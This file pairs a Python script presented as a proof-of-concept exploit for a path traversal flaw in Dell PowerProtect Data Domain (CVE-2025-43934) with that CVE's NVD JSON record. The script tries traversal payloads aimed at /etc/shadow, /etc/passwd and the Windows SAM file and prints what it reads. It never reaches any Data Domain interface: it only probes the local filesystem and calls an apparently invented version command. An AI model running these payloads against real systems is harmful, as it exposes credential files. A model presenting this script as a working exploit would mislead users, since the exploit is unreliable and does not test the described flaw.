CVE-2025-43934

# CVE-2025-43934 - Dell PowerProtect Data Domain Path Traversal PoC # This PoC demonstrates the path traversal vulnerability in DD OS # Note: This requires local access and high privileges on the target system import os import sys def exploit_path_traversal(target_path): """ Exploit path traversal vulnerability by constructing malicious paths with directory traversal sequences (../) """ # Normal path that should be restricted normal_path = "/data/backup/" # Malicious path using path traversal to access restricted directories # For example, trying to access /etc/shadow or other sensitive files traversal_sequences = [ "../../../etc/shadow", "../../../../etc/passwd", "../../../../etc/dd_system/config", "../" * 10 + "etc/shadow", "..\\..\\..\\windows\\system32\\config\\SAM", "/data/backup/../../etc/shadow", ] for seq in traversal_sequences: malicious_path = os.path.join(normal_path, seq) print(f"[*] Attempting path traversal with: {malicious_path}") try: # Attempt to access the file using the malicious path if os.path.exists(malicious_path): print(f"[+] SUCCESS: Accessed restricted file: {malicious_path}") with open(malicious_path, 'r') as f: content = f.read(100) # Read first 100 chars print(f"[+] Content preview: {content[:100]}") return True except PermissionError: print(f"[-] Permission denied for: {malicious_path}") except Exception as e: print(f"[-] Error accessing {malicious_path}: {e}") return False def check_vulnerable_system(): """ Check if the system is potentially vulnerable """ # Check DD OS version try: import subprocess result = subprocess.run(["ddos", "version"], capture_output=True, text=True) print(f"[*] DD OS Version: {result.stdout}") # Vulnerable versions vulnerable_versions = [ "7.7.1.0", "7.7.1.1", "7.7.1.2", "7.7.1.3", "7.7.1.4", "7.7.1.5", "7.10.1.0", "7.10.1.10", "7.10.1.20", "7.10.1.30", "7.10.1.40", "7.10.1.50", "7.10.1.60", "7.13.1.0", "7.13.1.10", "7.13.1.20", "7.13.1.30", "8.3.0.0", "8.3.0.1", "8.3.0.5", "8.3.0.10", "8.3.0.15", "8.3.1.0" ] for ver in vulnerable_versions: if ver in result.stdout: print(f"[!] VULNERABLE: DD OS version {ver} is affected by CVE-2025-43934") return True except Exception as e: print(f"[-] Could not determine DD OS version: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-43934 - Dell PowerProtect Data Domain Path Traversal") print("=" * 60) if check_vulnerable_system(): print("\n[*] System appears vulnerable. Attempting exploitation...") exploit_path_traversal("/data/backup/") else: print("\n[-] System does not appear to be vulnerable or version unknown.") print("[*] Attempting generic path traversal test...") exploit_path_traversal("/data/backup/")

{"cve": {"id": "CVE-2025-43934", "sourceIdentifier": "[email protected]", "published": "2025-10-07T19:15:38.237", "lastModified": "2025-10-14T20:08:46.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service and Unauthorized access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0.0", "versionEndIncluding": "8.3.0.15", "matchCriteriaId": "F1DB489A-E2CF-4477-A08B-101B569A714E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}